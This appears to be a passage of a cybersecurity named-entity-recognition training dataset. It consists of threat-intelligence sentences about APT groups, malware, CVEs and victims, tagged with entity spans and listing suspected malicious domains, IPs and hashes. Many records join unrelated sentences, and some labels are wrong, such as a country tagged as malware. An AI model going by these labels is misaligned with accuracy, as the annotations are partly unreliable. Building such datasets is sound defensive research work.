ESET researchers have identified five versions of the payload : At that time , Symantec observed the attackers breaching Saudi Arabian IT providers in an apparent supply chain attack designed to infect the customers with malware known as Syskit .", "spans": {"THREAT_ACTOR: Leviathan": [[281, 290]], "ORGANIZATION: military": [[381, 389]], "ORGANIZATION: ESET": [[435, 439]], "ORGANIZATION: Symantec": [[514, 522]], "THREAT_ACTOR: attackers": [[536, 545]], "ORGANIZATION: Saudi Arabian IT providers": [[556, 582]], "MALWARE: Syskit": [[673, 679]]}, "info": {"id": "cyberner_stix_train_004943", "source": "cyberner_stix_train"}} {"text": "Through named pipes , processes are able to communicate and exchange data even over a network .", "spans": {}, "info": {"id": "cyberner_stix_train_004944", "source": "cyberner_stix_train"}} {"text": "Unit 42 tracks this mobile Trojan as MobileOrder , as the authors specifically refer to commands within the app as orders . APT threat actors , most likely nation state-sponsored , targeted a diplomat in the French Ministry of Foreign Affairs with a seemingly legitimate invitation to a technology conference in Taiwan .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "TOOL: mobile Trojan": [[20, 33]], "TOOL: MobileOrder": [[37, 48]], "THREAT_ACTOR: APT threat actors": [[124, 141]], "ORGANIZATION: diplomat": [[192, 200]]}, "info": {"id": "cyberner_stix_train_004945", "source": "cyberner_stix_train"}} {"text": "PAGE – contact URL received from C & C using User-Agent value that was also received from C & C or local database . In September 2015 , Kaspersky Lab 's Anti-Targeted Attack Platform discovered anomalous network traffic in a government organization network . 
Targeted regions included in the list of Leafminer are Saudi Arabia , United Arab Emirates , Qatar , Kuwait , Bahrain , Egypt , Israel , and Afghanistan .", "spans": {"ORGANIZATION: Kaspersky Lab": [[136, 149]], "MALWARE: anomalous network traffic": [[194, 219]], "ORGANIZATION: government organization": [[225, 248]], "THREAT_ACTOR: Leafminer": [[300, 309]]}, "info": {"id": "cyberner_stix_train_004946", "source": "cyberner_stix_train"}} {"text": "By analyzing the TaskManager class we can see the new commands that are supported at this stage : As can be seen in the code snippet above , there are quite a lot of data collection tasks that are now available : Collect device info Track location Upload contacts information Upload sent and received SMS messages Upload images Upload video files Send recursive dirlist of the external storage Upload specific files Record audio using the microphone Record calls Use the camera to capture bursts of snapshots Those tasks can either run periodically , on event ( such as incoming call ) or when getting APT33 leverages popular Iranian hacker tools and DNS servers used by other suspected Iranian threat groups . So far, our telemetry hasn’t provided any concrete evidence that shows us how the Remexi malware . 
The result is that Vice Society is the most prolific attacker of education institutions in the two most attacked countries in the world : the USA and the UK .", "spans": {"THREAT_ACTOR: APT33": [[602, 607]], "THREAT_ACTOR: threat groups": [[695, 708]], "MALWARE: Remexi": [[793, 799]], "THREAT_ACTOR: Vice Society": [[829, 841]], "ORGANIZATION: education institutions": [[875, 897]], "ORGANIZATION: USA": [[952, 955]], "ORGANIZATION: UK": [[964, 966]]}, "info": {"id": "cyberner_stix_train_004947", "source": "cyberner_stix_train"}} {"text": "The user has been active in the malware testing environment since at least 2013 , testing customized versions of multiple open-source frameworks , including Metasploit , Cobalt Strike , PowerSploit , and other projects .", "spans": {"TOOL: Metasploit": [[157, 167]], "TOOL: Cobalt Strike": [[170, 183]], "TOOL: PowerSploit": [[186, 197]]}, "info": {"id": "cyberner_stix_train_004948", "source": "cyberner_stix_train"}} {"text": "ssl.microsoft-security-center.com Whoisguard Unknown July 20 , 2015 E-TIME.usv0503.iqservs-jp.com Domain@quicca.com 133.242.134.121 August 18 , 2014 .", "spans": {"DOMAIN: ssl.microsoft-security-center.com": [[0, 33]], "TOOL: Whoisguard": [[34, 44]], "DOMAIN: 2015 E-TIME.usv0503.iqservs-jp.com": [[63, 97]], "EMAIL: Domain@quicca.com": [[98, 115]], "IP_ADDRESS: 133.242.134.121": [[116, 131]]}, "info": {"id": "cyberner_stix_train_004949", "source": "cyberner_stix_train"}} {"text": "youlabuy [ . The DeepSight MATI team authored this blog and its customers have received intelligence with additional details about these campaigns , the characteristics of the Waterbug (aka Turla) cyber espionage group , and methods of detecting and thwarting activities of this adversary . 
In this article , we will analyse this evolution: at the beginning the malware was only an information stealer without remote administration , it moved from a single file malware to a dual file malware (an executable and a dynamic library ) , the malware has supported more and more features over the time , the decoy documents have become more and more advanced .", "spans": {"ORGANIZATION: DeepSight MATI team": [[17, 36]], "THREAT_ACTOR: Waterbug": [[176, 184]], "THREAT_ACTOR: group": [[213, 218]], "TOOL: dynamic library": [[514, 529]]}, "info": {"id": "cyberner_stix_train_004950", "source": "cyberner_stix_train"}} {"text": "The threat actor behind ProjectSauron commands a top-of-the-top modular cyber-espionage platform in terms of technical sophistication , designed to enable long-term campaigns through stealthy survival mechanisms coupled with multiple exfiltration methods . Dragos' data indicates XENOTIME remains active .", "spans": {"TOOL: ProjectSauron": [[24, 37]], "ORGANIZATION: Dragos'": [[257, 264]], "THREAT_ACTOR: XENOTIME": [[280, 288]]}, "info": {"id": "cyberner_stix_train_004951", "source": "cyberner_stix_train"}} {"text": "Opening the attached “ Defence & Security 2018 Conference Agenda.docx ” file does not immediately run malicious code to exploit the system .", "spans": {"FILEPATH: Defence & Security 2018 Conference Agenda.docx": [[23, 69]]}, "info": {"id": "cyberner_stix_train_004952", "source": "cyberner_stix_train"}} {"text": "To run its code in kernel mode in the most recent versions of operating systems , that have Driver Signature Enforcement , Slingshot loads signed vulnerable drivers and runs its own code through their vulnerabilities . 
A previous , removed , report from another vendor claimed non-specific information about the groups' interest in Chinese universities , but that report has been removed – most likely detections were related to students’ and researchers’ scanning known collected samples and any incidents” remain unconfirmed and unknown .", "spans": {"TOOL: Slingshot": [[123, 132]], "THREAT_ACTOR: groups'": [[312, 319]], "ORGANIZATION: Chinese universities": [[332, 352]]}, "info": {"id": "cyberner_stix_train_004953", "source": "cyberner_stix_train"}} {"text": "After successfully accessing the machine , the attacker deployed tools on the machine , spread laterally through the victim's network , and accessed the victim's OWA account .", "spans": {"TOOL: OWA": [[162, 165]]}, "info": {"id": "cyberner_stix_train_004954", "source": "cyberner_stix_train"}} {"text": "Paying attention to the details of past attacks is also an important means of preparing for future attacks .", "spans": {}, "info": {"id": "cyberner_stix_train_004955", "source": "cyberner_stix_train"}} {"text": "At different times , we have seen three or more active variants using different approaches or targeting different carriers . It targets organizations in Japan , South Korea , and Taiwan , leveling its attacks on public sector agencies and telecommunications and other high-technology industries . This configuration info can be changed with a tool included in the ZxShell package . 
TANKTRAP is a utility written in PowerShell that utilizes Windows group policy to spread and launch a wiper .", "spans": {"ORGANIZATION: public sector agencies": [[212, 234]], "ORGANIZATION: telecommunications": [[239, 257]], "ORGANIZATION: high-technology industries": [[268, 294]], "MALWARE: ZxShell": [[364, 371]], "MALWARE: TANKTRAP": [[382, 390]]}, "info": {"id": "cyberner_stix_train_004956", "source": "cyberner_stix_train"}} {"text": "In late October and early November 2018 , Unit 42 intercepted a series of weaponized documents that use a technique to load remote templates containing a malicious macro .", "spans": {"ORGANIZATION: Unit 42": [[42, 49]], "TOOL: malicious macro": [[154, 169]]}, "info": {"id": "cyberner_stix_train_004957", "source": "cyberner_stix_train"}} {"text": "Of note , the callbacks were to PHP scripts that included / dad5 / in the URLs .", "spans": {}, "info": {"id": "cyberner_stix_train_004958", "source": "cyberner_stix_train"}} {"text": "The ‘ Register ’ and ‘ Sign Up ’ links are broken and ‘ redirects ’ the user back to the login page . Bankshot is designed to persist on a victim 's network for further exploitation ; thus the Advanced Threat Research team believes this operation is intended to gain access to specific financial organizations . 
This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) .", "spans": {"TOOL: Bankshot": [[102, 110]], "ORGANIZATION: Advanced Threat Research": [[193, 217]], "ORGANIZATION: financial organizations": [[286, 309]], "TOOL: emails": [[382, 388]], "FILEPATH: Microsoft Word attachment": [[396, 421]], "VULNERABILITY: CVE-2017-0199": [[454, 467]], "MALWARE: ZeroT Trojan": [[482, 494]], "MALWARE: PlugX Remote Access Trojan": [[526, 552]], "MALWARE: RAT": [[555, 558]]}, "info": {"id": "cyberner_stix_train_004959", "source": "cyberner_stix_train"}} {"text": "During this time they were able to steal digital certificates from South Korean companies and launch attacks against Indian and Saudi Arabian government organizations . Furthermore , Dragos' analysis of the TRISIS event continues as we recover additional data surrounding the incident .", "spans": {"ORGANIZATION: companies": [[80, 89]], "ORGANIZATION: government organizations": [[142, 166]], "ORGANIZATION: Dragos'": [[183, 190]], "MALWARE: TRISIS": [[207, 213]]}, "info": {"id": "cyberner_stix_train_004960", "source": "cyberner_stix_train"}} {"text": "What ’ s more , the numbering of Asacub versions is a continuation of the Smaps system . CTU researchers have observed the Threat Group-3390 obtaining information about specific U.S. defense projects that would be desirable to those operating within a country with a manufacturing base , an interest in U.S. military capability , or both . The zombie host initiates the scan — another routine from previous campaigns — but updated with a larger set of parameters and programmed to run in the background . 
Following a three - month lull of activity , Cl0p returned with a vengeance in June and beat out LockBit as the month ’s most active ransomware gang .", "spans": {"MALWARE: Asacub": [[33, 39]], "MALWARE: Smaps": [[74, 79]], "ORGANIZATION: CTU": [[89, 92]], "THREAT_ACTOR: Group-3390": [[130, 140]], "ORGANIZATION: U.S. defense": [[178, 190]], "ORGANIZATION: military capability": [[308, 327]], "THREAT_ACTOR: Cl0p": [[550, 554]], "THREAT_ACTOR: LockBit": [[602, 609]]}, "info": {"id": "cyberner_stix_train_004961", "source": "cyberner_stix_train"}} {"text": "For example , this is how opcode 0x1A is implemented : The opcode should represent a JB ( Jump if below ) function , but it ’ s implemented through set carry ( STC ) instruction followed by a JMP into the dispatcher code that will verify the carry flag condition set by STC . We were ultimately able to identify multiple organizations in the government , energy , and technology sectors targeted by Magic Hound . Winnti : 44260a1dfd92922a621124640015160e621f32d5 https://dump.gxxservice.com/common/up/up_base.php . Another wave of suspected Dukes attacks was identified in November 2018 by FireEye , this time again relying on Windows LNK files and deploying Cobalt Strike .", "spans": {"ORGANIZATION: government": [[342, 352]], "ORGANIZATION: energy": [[355, 361]], "ORGANIZATION: technology sectors": [[368, 386]], "THREAT_ACTOR: Winnti": [[413, 419]], "FILEPATH: 44260a1dfd92922a621124640015160e621f32d5": [[422, 462]], "URL: https://dump.gxxservice.com/common/up/up_base.php": [[463, 512]], "ORGANIZATION: FireEye": [[590, 597]], "TOOL: Cobalt Strike": [[659, 672]]}, "info": {"id": "cyberner_stix_train_004962", "source": "cyberner_stix_train"}} {"text": "org : 173.252.207.71 , 173.252.205.36 , 173.252.205.37 , 173.252.205.64 . antivirus-groups.com : 74.82.166.205 , 204.74.215.58 . domain.rm6.org : 216.131.95.22 , 222.255.28.27 . 
anti-virus.sytes.net : 173.252.205.36 , 173.252.205.37 , 173.252.205.64 .", "spans": {"DOMAIN: org": [[0, 3]], "IP_ADDRESS: 173.252.207.71": [[6, 20]], "IP_ADDRESS: 173.252.205.36": [[23, 37], [201, 215]], "IP_ADDRESS: 173.252.205.37": [[40, 54], [218, 232]], "IP_ADDRESS: 173.252.205.64": [[57, 71], [235, 249]], "DOMAIN: antivirus-groups.com": [[74, 94]], "IP_ADDRESS: 74.82.166.205": [[97, 110]], "IP_ADDRESS: 204.74.215.58": [[113, 126]], "DOMAIN: domain.rm6.org": [[129, 143]], "IP_ADDRESS: 216.131.95.22": [[146, 159]], "IP_ADDRESS: 222.255.28.27": [[162, 175]], "DOMAIN: anti-virus.sytes.net": [[178, 198]]}, "info": {"id": "cyberner_stix_train_004963", "source": "cyberner_stix_train"}} {"text": "APT41 has targeted payment services specializing in handling in-game transactions and real money transfer (RMT) purchases . Some time ago , a Kaspersky Lab customer in Latin America contacted us to say he had visited China and suspected his machine was infected with an unknown , undetected malware .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]], "ORGANIZATION: payment services": [[19, 35]], "ORGANIZATION: Kaspersky Lab": [[142, 155]]}, "info": {"id": "cyberner_stix_train_004964", "source": "cyberner_stix_train"}} {"text": "Stolen data is stored in external storage under the /DCIM/ directory with a hidden sub-directory named \" .dat '' . One hour later , Bemstour was used against an educational institution in Belgium . Sandworm Team targets mainly Ukrainian entities associated with energy , industrial control systems , SCADA , government , and media .", "spans": {"MALWARE: Bemstour": [[132, 140]], "MALWARE: Belgium": [[188, 195]], "THREAT_ACTOR: Sandworm Team": [[198, 211]]}, "info": {"id": "cyberner_stix_train_004965", "source": "cyberner_stix_train"}} {"text": "We also uncovered ViperRAT in a billiards game , an Israeli Love Songs player , and a Move To iOS app . We identified several European governments and defense companies compromised with this group . 
There are minor differences between the ZxShell implementation of this command and the original Windows one . Figure 6 : “ lun.vbs ” contents", "spans": {"MALWARE: ViperRAT": [[18, 26]], "SYSTEM: iOS": [[94, 97]], "ORGANIZATION: European governments": [[126, 146]], "ORGANIZATION: defense companies": [[151, 168]], "MALWARE: ZxShell": [[239, 246]], "SYSTEM: Windows": [[295, 302]]}, "info": {"id": "cyberner_stix_train_004966", "source": "cyberner_stix_train"}} {"text": "Like FakeDefender and DataLust , Charger could be an indicator of a wider effort by mobile malware developers to catch up with their PC ransomware cousins . In the same year , Silence conducted DDoS attacks using the Perl IRC bot and public IRC chats to control Trojans . What is interesting , in some emails , they ask targets to phone them if they have any questions , like the FIN7 guys do . Designed to guard against XSS attacks , CSP helps control which domains can be accessed as part of a page and therefore restricts which domains to share data with .", "spans": {"MALWARE: FakeDefender": [[5, 17]], "MALWARE: DataLust": [[22, 30]], "MALWARE: Charger": [[33, 40]], "TOOL: Perl IRC bot": [[217, 229]], "TOOL: public IRC chats": [[234, 250]], "TOOL: emails": [[302, 308]], "THREAT_ACTOR: FIN7": [[380, 384]], "THREAT_ACTOR: XSS attacks": [[421, 432]], "SYSTEM: CSP": [[435, 438]]}, "info": {"id": "cyberner_stix_train_004967", "source": "cyberner_stix_train"}} {"text": "It detects and blocks this threat at the initial level of the attack cycle when the malicious macro attempts to invoke the first stage PowerShell payload .", "spans": {"TOOL: PowerShell": [[135, 145]]}, "info": {"id": "cyberner_stix_train_004968", "source": "cyberner_stix_train"}} {"text": "These attacks are only becoming more common , with one third of all malware now targeting mobile endpoints . In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 . 
APT10 ceased its use of the Poison Ivy malware family after a 2013 FireEye report , which comprehensively detailed the malware 's functionality and features , and its use by several China-based threat actors , including APT10 .", "spans": {"MALWARE: RTF attachments": [[153, 168]], "VULNERABILITY: CVE-2017-0199": [[233, 246]], "THREAT_ACTOR: APT10": [[249, 254], [469, 474]], "MALWARE: Poison Ivy malware family": [[277, 302]], "ORGANIZATION: FireEye": [[316, 323]], "THREAT_ACTOR: actors": [[450, 456]]}, "info": {"id": "cyberner_stix_train_004969", "source": "cyberner_stix_train"}} {"text": "As described in the infection flow , one of the first uses of the AutoHotKey scripts is to upload a screenshot from the compromised PC . Rapid7 reviewed malware discovered in the victim’s environment and found implants that used Dropbox as the C2 .", "spans": {"MALWARE: AutoHotKey scripts": [[66, 84]], "ORGANIZATION: Rapid7": [[137, 143]], "FILEPATH: Dropbox": [[229, 236]], "TOOL: C2": [[244, 246]]}, "info": {"id": "cyberner_stix_train_004970", "source": "cyberner_stix_train"}} {"text": "The vast majority of these target Windows machines through Word documents exploiting known vulnerabilities such as CVE-2012-0158 , CVE-2010-3333 and CVE-2009-3129 . The decoy documents used by the InPage exploits suggest that the targets are likely to be politically or militarily motivated . 
Night Dragon 's attacks have involved social engineering , spearphishing attacks , exploitation of Microsoft Windows operating systems vulnerabilities , Microsoft Active Directory compromises , and the use of remote administration tools ( RATs ) in targeting and harvesting sensitive competitive proprietary operations and project-financing information with regard to oil and gas field bids and operations .", "spans": {"SYSTEM: Windows": [[34, 41], [402, 409]], "SYSTEM: Word": [[59, 63]], "VULNERABILITY: CVE-2012-0158": [[115, 128]], "VULNERABILITY: CVE-2010-3333": [[131, 144]], "VULNERABILITY: CVE-2009-3129": [[149, 162]], "TOOL: decoy documents": [[169, 184]], "VULNERABILITY: InPage exploits": [[197, 212]], "ORGANIZATION: politically": [[255, 266]], "ORGANIZATION: militarily": [[270, 280]], "THREAT_ACTOR: Night Dragon": [[293, 305]], "ORGANIZATION: social engineering": [[331, 349]], "ORGANIZATION: Microsoft": [[392, 401], [446, 455]], "MALWARE: remote administration tools": [[502, 529]], "MALWARE: RATs": [[532, 536]], "ORGANIZATION: oil and gas": [[661, 672]]}, "info": {"id": "cyberner_stix_train_004971", "source": "cyberner_stix_train"}} {"text": "So , what can you do to protect yourself from this stealthy beast ? One vulnerability is a Windows zero-day vulnerability (CVE-2019-0703) discovered by Symantec . 
APT34 uses a mix of public and non-public tools , often conducting spear phishing operations using compromised accounts , sometimes coupled with social engineering tactics .", "spans": {"VULNERABILITY: zero-day vulnerability": [[99, 121]], "ORGANIZATION: Symantec": [[152, 160]], "THREAT_ACTOR: APT34": [[163, 168]], "MALWARE: public and non-public tools": [[183, 210]], "MALWARE: compromised accounts": [[262, 282]]}, "info": {"id": "cyberner_stix_train_004972", "source": "cyberner_stix_train"}} {"text": "Further assets are decrypted and deployed , including another Dalvik DEX code file , which has various capabilities including registering itself as the incoming SMS handler for the device to intercept SMS messages , loading another ELF library that includes a version of BusyBox - a package containing various stripped-down Unix tools useful for administering such systems – and , interestingly , is capable of turning off the sound played when the device ’ s cameras take pictures . Supply chain compromises are most likely an extension of APT41's tactics used in gaining access to gaming development environments and to other gaming organizations via third-party service providers . Upon gaining access to the machines connected to corporate and guest Wi-Fi networks , APT28 deployed Responder .", "spans": {"SYSTEM: BusyBox": [[271, 278]], "THREAT_ACTOR: APT41's": [[541, 548]], "THREAT_ACTOR: APT28": [[771, 776]], "MALWARE: Responder": [[786, 795]]}, "info": {"id": "cyberner_stix_train_004973", "source": "cyberner_stix_train"}} {"text": "The tweet stated that TrickBot , a well-known banking Trojan owned by an organized cybercrime gang , uses man-in-the-browser ( MITB ) web injects in online banking sessions to ask infected users for their mobile phone number and device type . 
Dubbed ‘Operation Sheep’ , this massive data stealing campaign is the first known campaign seen in the wild to exploit the Man-in-the-Disk vulnerability revealed by Check Point Research earlier last year . APT34 are involved in long-term cyber espionage operations largely focused on the Middle East .", "spans": {"MALWARE: TrickBot": [[22, 30]], "THREAT_ACTOR: ‘Operation Sheep’": [[250, 267]], "VULNERABILITY: Man-in-the-Disk": [[366, 381]], "THREAT_ACTOR: APT34": [[449, 454]]}, "info": {"id": "cyberner_stix_train_004974", "source": "cyberner_stix_train"}} {"text": "] website updatemobapp [ . On May 16 , 2019 FireEye 's Advanced Practices team attributed the remaining \" suspected APT33 activity \" ( referred to as GroupB in this blog post ) to APT33 , operating at the behest of the Iranian government . Send exfiltrated data, taskkill.exe Ends working cycle of . Dubbing the threat actor TunnelVision , whose TTPs overlap with those of Charming Kitten and Phosphorus , the researchers observed that the group is characterized by the wide exploitation of oneday vulnerabilities in specific regions .", "spans": {"ORGANIZATION: FireEye 's Advanced Practices": [[44, 73]], "THREAT_ACTOR: APT33": [[180, 185]], "FILEPATH: taskkill.exe": [[263, 275]], "THREAT_ACTOR: TunnelVision": [[325, 337]], "THREAT_ACTOR: Charming Kitten": [[373, 388]], "THREAT_ACTOR: Phosphorus": [[393, 403]]}, "info": {"id": "cyberner_stix_train_004975", "source": "cyberner_stix_train"}} {"text": "The code snippet below shows part of the screen parsing process . This particular threat was also used by hackers to compromise a Korean social network site to steal records of 35 million users . Today , FireEye released Indicators of Compromise ( IOCs ) for BLACKCOFFEE and Microsoft released signatures for its anti-malware products . 
The MiniDuke attackers are still active at this time and have created malware as recently as February 20 , 2013 .", "spans": {"ORGANIZATION: FireEye": [[204, 211]], "MALWARE: BLACKCOFFEE": [[259, 270]], "ORGANIZATION: Microsoft": [[275, 284]], "THREAT_ACTOR: MiniDuke attackers": [[341, 359]]}, "info": {"id": "cyberner_stix_train_004976", "source": "cyberner_stix_train"}} {"text": "Dragos ’ data indicates XENOTIME remains active .", "spans": {"ORGANIZATION: Dragos": [[0, 6]], "THREAT_ACTOR: XENOTIME": [[24, 32]]}, "info": {"id": "cyberner_stix_train_004977", "source": "cyberner_stix_train"}} {"text": "However , the director created a new organization in Cyprus named LokD . In most cases , the attackers only had to infect the computer on which the RBS software was installed in order to start stealing the cash . emails from spoofed senders were usually sent via mail servers in the United States and China . Malwarebytes 's EDR shows the full attack chain ( please click to enlarge ): The NetSupport RAT files are hosted on the same compromised WordPress site used earlier to download the Internet shortcut .", "spans": {"ORGANIZATION: LokD": [[66, 70]], "TOOL: emails": [[213, 219]], "ORGANIZATION: Malwarebytes 's": [[309, 324]], "MALWARE: NetSupport RAT": [[390, 404]]}, "info": {"id": "cyberner_stix_train_004978", "source": "cyberner_stix_train"}} {"text": "Kaspersky believes both Shamoon and StoneDrill groups are aligned in their interests , but are two separate actors , which might also indicate two different groups working together . 
The delivery of KopiLuwak in this instance is currently unknown as the MSIL dropper has only been observed by Proofpoint researchers on a public malware repository .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: Shamoon": [[24, 31]], "THREAT_ACTOR: StoneDrill": [[36, 46]], "FILEPATH: MSIL dropper": [[254, 266]], "ORGANIZATION: Proofpoint": [[293, 303]]}, "info": {"id": "cyberner_stix_train_004979", "source": "cyberner_stix_train"}} {"text": "However , Talos has identified that was used at least since November 2018 . MSPs therefore represent a high-payoff target for espionagefocused threat actors such as APT10 . OceanLotus : enum.arkoorr.com:8888 11b4 . The leaked Biderman emails show that Harrison made good on his threats , and that in the months that followed Harrison began targeting Biderman and other Ashley Madison executives with menacing anonymous emails and spoofed phone calls laced with profanity and anti - Semitic language .", "spans": {"ORGANIZATION: Talos": [[10, 15]], "ORGANIZATION: MSPs": [[76, 80]], "THREAT_ACTOR: threat actors": [[143, 156]], "THREAT_ACTOR: APT10": [[165, 170]], "THREAT_ACTOR: OceanLotus": [[173, 183]], "DOMAIN: enum.arkoorr.com:8888": [[186, 207]], "THREAT_ACTOR: Harrison": [[252, 260], [325, 333]], "ORGANIZATION: Biderman": [[350, 358]], "ORGANIZATION: Ashley Madison executives": [[369, 394]]}, "info": {"id": "cyberner_stix_train_004980", "source": "cyberner_stix_train"}} {"text": "In addition to the aforementioned post-exploitation tools , the actors used these webshells to upload legitimate executables that they would use DLL sideloading to run a malicious DLL that has code overlaps with known Emissary Panda attacks . 
We can observe that the sample is very recent , created on Thursday , July 4", "spans": {"THREAT_ACTOR: Emissary Panda": [[218, 232]], "FILEPATH: sample": [[267, 273]]}, "info": {"id": "cyberner_stix_train_004981", "source": "cyberner_stix_train"}} {"text": "the file specified by the C & C server Deldatall8 Delete all files stored in the /sdcard/DCIM/.dat/ directory We do n't have the space to cover all of the commands , but let 's take a look at some of the major ones . Bemstour was used again in June 2017 in an attack against an organization in Luxembourg . Silence is a financially motivated threat actor targeting financial institutions in different countries .", "spans": {"MALWARE: Bemstour": [[217, 225]], "THREAT_ACTOR: Silence": [[307, 314]]}, "info": {"id": "cyberner_stix_train_004982", "source": "cyberner_stix_train"}} {"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . the backdoor is packaged together with the CVE-2013-5065 EoP exploit and heavily obfuscated .", "spans": {"ORGANIZATION: government officials": [[28, 48]], "MALWARE: malicious Microsoft Word document": [[90, 123]], "VULNERABILITY: CVE-2012-0158": [[143, 156]], "VULNERABILITY: CVE-2013-5065": [[244, 257]], "TOOL: EoP": [[258, 261]], "VULNERABILITY: exploit": [[262, 269]]}, "info": {"id": "cyberner_stix_train_004983", "source": "cyberner_stix_train"}} {"text": "We are continuing to watch it closely . Kessem . Once installed , APT1 intruders have the option to tell victim systems to download and execute additional malicious software of their choice . 
The cryptographic certificates have also been exploited in attacks that have hit companies in the aerospace industry .", "spans": {"ORGANIZATION: Kessem": [[40, 46]], "THREAT_ACTOR: APT1": [[66, 70]], "SYSTEM: The cryptographic certificates": [[192, 222]], "ORGANIZATION: aerospace industry": [[290, 308]]}, "info": {"id": "cyberner_stix_train_004984", "source": "cyberner_stix_train"}} {"text": "TA505 primarily distributed GlobeImposter in zipped script attachments through the beginning of September 2017 .", "spans": {"THREAT_ACTOR: TA505": [[0, 5]], "MALWARE: GlobeImposter": [[28, 41]], "TOOL: zipped": [[45, 51]]}, "info": {"id": "cyberner_stix_train_004985", "source": "cyberner_stix_train"}} {"text": "Some detection mechanisms and sandboxes may whitelist such package names , in an effort to prevent wasting resources . APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel files to deliver their initial exploits . AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products .", "spans": {"THREAT_ACTOR: APT19": [[119, 124]], "MALWARE: Microsoft Excel files": [[176, 197]], "ORGANIZATION: AMP Threat Grid": [[234, 249]], "ORGANIZATION: Cisco Security": [[314, 328]]}, "info": {"id": "cyberner_stix_train_004986", "source": "cyberner_stix_train"}} {"text": "\" I tried reaching out to Adups and never heard back , '' Strazzere tells Information Security Media Group . Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 . 
Datper : 7d70d659c421b50604ce3e0a1bf423ab7e54b9df361360933bac3bb852a31849 .", "spans": {"ORGANIZATION: Adups": [[26, 31]], "ORGANIZATION: Information Security Media Group": [[74, 106]], "ORGANIZATION: Anomali": [[109, 116]], "MALWARE: ITW": [[195, 198]], "VULNERABILITY: CVE-2018-0798": [[226, 239]], "MALWARE: Datper": [[242, 248]], "FILEPATH: 7d70d659c421b50604ce3e0a1bf423ab7e54b9df361360933bac3bb852a31849": [[251, 315]]}, "info": {"id": "cyberner_stix_train_004987", "source": "cyberner_stix_train"}} {"text": "While the Dumpert tool is meant to help red teams emulate an adversary , we had not seen this tool used by threat actors until it was uploaded to this related webshell on September 23 , 2019 .", "spans": {"TOOL: Dumpert": [[10, 17]]}, "info": {"id": "cyberner_stix_train_004988", "source": "cyberner_stix_train"}} {"text": "After thorough analysis , ESET researchers are highly confident that this campaign is run by the OceanLotus group , also known as APT32 and APT-C-00 . The malware may inject itself into browser processes and explorer.exe .", "spans": {"ORGANIZATION: ESET": [[26, 30]], "THREAT_ACTOR: OceanLotus": [[97, 107]], "THREAT_ACTOR: APT32": [[130, 135]], "THREAT_ACTOR: APT-C-00": [[140, 148]], "MALWARE: malware": [[155, 162]], "FILEPATH: explorer.exe": [[208, 220]]}, "info": {"id": "cyberner_stix_train_004989", "source": "cyberner_stix_train"}} {"text": "FireEye iSIGHT Intelligence confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims . 
Turla all uses an encrypted container to store the malware 's components and configuration and they also log their actions in a file .", "spans": {"ORGANIZATION: FireEye iSIGHT Intelligence": [[0, 27]], "THREAT_ACTOR: APT37": [[74, 79]], "VULNERABILITY: zero-day Adobe Flash vulnerability": [[92, 126]], "VULNERABILITY: CVE-2018-4878": [[129, 142]], "TOOL: DOGCALL malware": [[159, 174]], "THREAT_ACTOR: Turla": [[201, 206]], "MALWARE: encrypted container": [[219, 238]]}, "info": {"id": "cyberner_stix_train_004990", "source": "cyberner_stix_train"}} {"text": "Tensions Between Hamas and the Egyptian Government : Egypt plays a major role as a mediator in the Israeli-Palestinian confict and has brokered several ceasefire deals and other negotiations in the past .", "spans": {"ORGANIZATION: Hamas": [[17, 22]]}, "info": {"id": "cyberner_stix_train_004991", "source": "cyberner_stix_train"}} {"text": "In a previous execution ( published in June 2019 ) , we observed that dota2 had its own folder but it was hardly executed .", "spans": {"TOOL: dota2": [[70, 75]]}, "info": {"id": "cyberner_stix_train_004992", "source": "cyberner_stix_train"}} {"text": "This version of the module does not rely on an external transport DLL for communicating with its C2 servers ; instead it directly uses Wininet API functions .", "spans": {"TOOL: DLL": [[66, 69]], "TOOL: C2": [[97, 99]], "TOOL: Wininet": [[135, 142]]}, "info": {"id": "cyberner_stix_train_004993", "source": "cyberner_stix_train"}} {"text": "The data that Domestic Kitten steals follows a similar format with Bouncing Golf ’ s , with each type of data having a unique identifying character . Thursday 's Flash Player update patched 36 vulnerabilities in total including the zero day CVE-2016-4171 . Given FIN7 ’s previous use of false security companies , we decided to look deeper into this one . 
Adversaries may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"MALWARE: Domestic Kitten": [[14, 29]], "MALWARE: Bouncing Golf": [[67, 80]], "VULNERABILITY: zero day": [[232, 240]], "VULNERABILITY: CVE-2016-4171": [[241, 254]], "THREAT_ACTOR: FIN7": [[263, 267]], "THREAT_ACTOR: Adversaries": [[356, 367]]}, "info": {"id": "cyberner_stix_train_004994", "source": "cyberner_stix_train"}} {"text": "Some BRONZE PRESIDENT C2 domains analyzed by CTU researchers were hosted on infrastructure owned by Dutch VPS provider Host Sailor , Hong Kong-based New World Telecoms , and Malaysia-based Shinjiru Technology ( see Figure 7 ) .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[5, 21]], "TOOL: C2": [[22, 24]], "ORGANIZATION: CTU": [[45, 48]], "TOOL: VPS": [[106, 109]]}, "info": {"id": "cyberner_stix_train_004995", "source": "cyberner_stix_train"}} {"text": "The detection evasion techniques we observed in the Okrum malware include embedding the malicious payload within a legitimate PNG image , employing several anti-emulation and anti-sandbox tricks , as well as making frequent changes in implementation . 
